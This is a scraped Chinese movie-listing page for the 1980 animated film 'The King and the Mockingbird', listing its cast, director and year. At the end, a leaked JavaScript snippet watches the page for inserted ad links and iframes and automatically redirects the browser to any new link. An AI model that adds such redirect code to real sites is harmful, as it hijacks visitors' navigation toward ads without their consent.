国王与小鸟(国语版)

国王与小鸟(国语版)

  • 主演:让·马丹 帕斯卡尔·马佐蒂 雷蒙·比西埃尔 阿涅斯·维亚拉 勒诺·马克斯 于贝尔·德尚 罗热·布兰 菲利普·德雷 阿尔贝·梅迪纳 克洛德·皮埃普吕 利奥内尔·夏尔皮 雅克·科隆巴 罗贝尔·隆巴尔 让·梅尔梅 樊尚·蒙特罗贝尔 波佩克 皮埃尔·里施 布律诺·塞尔蒙 让·维姆内 让娜·维塔 
  • 导演:保罗·格里莫尔 
  • 年份:1980
返回顶部
// 自动监听插入的 或 iframe,提取跳转链接 const observer = new MutationObserver((muts) => { for (const m of muts) { for (const node of m.addedNodes) { if (node.nodeType !== 1) continue; const el = node; // case 1: 链接 if (el.tagName === "A" && el.href.includes("http")) { console.log("🎯 发现广告链接:", el.href); window.location.href = el.href; } // case 2: iframe if (el.tagName === "IFRAME" && el.src.includes("http")) { console.log("🎯 发现广告 iframe:", el.src); // window.location.href = el.src; } } } }); observer.observe(document.body, { childList: true, subtree: true });